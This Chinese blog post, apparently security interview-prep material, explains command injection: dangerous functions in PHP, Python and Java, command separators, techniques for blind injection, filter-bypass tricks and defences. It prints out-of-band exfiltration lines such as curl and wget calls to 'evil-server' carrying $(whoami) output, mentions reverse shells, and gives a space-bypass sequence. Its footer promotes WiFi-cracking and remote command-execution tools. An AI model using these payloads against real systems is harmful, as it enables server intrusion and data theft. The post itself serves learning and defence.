您当前的位置: 首页 >  网络

罗四强

暂无认证

  • 1浏览

    0关注

    497博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

【网络安全面试题】—如何注入攻击Java Python PHP等主流语言

罗四强 发布时间:2022-01-24 08:30:00 ,浏览量:1

4.5. 命令注入 4.5.1. 简介

命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。

该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。

4.5.2. 常见危险函数 4.5.2.1. PHP
  • system
  • exec
  • passthru
  • shell_exec
  • popen
  • proc_open
4.5.2.2. Python
  • system
  • popen
  • subprocess.call
  • spawn
4.5.2.3. Java
  • java.lang.Runtime.getRuntime().exec(command)
4.5.3. 常见注入方式
  • 分号分割
  • || && & 分割
  • | 管道符
  • \r\n %d0%a0 换行
  • 反引号解析
  • $() 替换
4.5.4. 无回显技巧
  • bash反弹shell
  • DNS带外数据
  • http带外

    • curl http://evil-server/$(whoami)
    • wget http://evil-server/$(whoami)
  • 无带外时利用 sleep 或其他逻辑构造布尔条件
4.5.5. 常见绕过方式 4.5.5.1. 空格绕过
  • wget\ >foo.\ >com ls -t>a sh a

    上面的方法为通过命令行重定向写入命令,接着通过ls按时间排序把命令写入文件,最后执行 直接在Linux终端下执行的话,创建文件需要在重定向符号之前添加命令 这里可以使用一些诸如w,[之类的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能结束,这样就等于标准输入流的重定向 而在php中 , 使用 shell_exec 等执行系统命令的函数的时候 , 是不存在标准输入流的,所以可以直接创建文件

    4.5.6. 常用符号 4.5.6.1. 命令分隔符
    • %0a / %0d / \n / \r
    • ;
    • & / &&
    4.5.6.2. 通配符
    • * 0到无穷个任意字符
    • ? 一个任意字符
    • [ ] 一个在括号内的字符,e.g. [abcd]
    • [ - ] 在编码顺序内的所有字符
    • [^ ] 一个不在括号内的字符

    4.5.7. 防御
    • 不使用时禁用相应函数
    • 尽量不要执行外部的应用程序或命令
    • 做输入的格式检查
    • 转义命令中的所有shell元字符

      • shell元字符包括 #&;`,|*?~^()[]{}$\
    【工具推荐】

     【kali渗透测试工具】无线信号搜索工具_kali更新【kali常用工具】无线信号搜索工具_kali更新_kali更新-互联网文档类资源-CSDN下载

    【kali渗透测试工具】inssider信号测试软件_kali常用工具【kali常用工具】inssider信号测试软件_kali常用工具-网管软件文档类资源-CSDN下载

    【kali渗透测试工具】MAC地址修改工具 保护终端不暴露【kali常用工具】MAC地址修改工具保护终端不暴露-Linux文档类资源-CSDN下载

    【kal渗透测试工具】脚本管理工具 php和jsp页面 接收命令参数 在服务器端执行脚本管理工具php和jsp页面接收命令参数在服务器端执行-网络安全文档类资源-CSDN下载

    【kali渗透测试工具】上网行为监控工具       上网行为工具-网络安全文档类资源-CSDN下载

    【kali渗透测试工具】抓包工具Charles Windows64位 免费版抓包工具CharlesWindows64位免费版-网络监控文档类资源-CSDN下载

    【kali常用工具】图印工具stamp.zip图印工具stamp.zip-制造文档类资源-CSDN下载

    【kali常用工具】brutecrack工具[WIFIPR中文版]及wpa/wpa2字典

    brutecrack工具[WIFIPR中文版]及wpa/wpa2字典_wifipr-其它文档类资源-CSDN下载

    【kali常用工具】EWSA 5.1.282-破包工具【kali常用工具】EWSA5.1.282-破包工具_kali跑包工具-管理软件文档类资源-CSDN下载

    【kali常用工具】Realtek 8812AU KALI网卡驱动及安装教程【kali常用工具】Realtek8812AUKALI网卡驱动及安装教程_kalirtl8812au,kali安装8812au驱动-网络设备文档类资源-CSDN下载

    推荐阅读 python及安全系列

    【渗透案例】上班摸鱼误入陌生网址——结果被XSS劫持了

    【渗透测试】python你TM太皮了——区区30行代码就能记录键盘的一举一动

    【渗透实战】女神相册密码忘记了,我只用Python写了20行代码~~~

    【渗透测试】密码暴力破解工具——九头蛇(hydra)使用详解及实战

    【渗透案例】如何用ssh工具连接前台小姐姐的“小米手机”——雷总看了直呼内行!!!  

    pygame系列文章

    一起来学pygame吧 游戏开发30例(二)——塔防游戏

    一起来学pygame吧 游戏开发30例(三)——射击外星人小游戏 

    一起来学pygame吧 游戏开发30例(四)——俄罗斯方块小游戏 

    一起来学pygame吧 游戏开发30例(五)——消消乐 小游戏

关注
打赏
1625533955
查看更多评论
立即登录/注册

微信扫码登录

0.0378s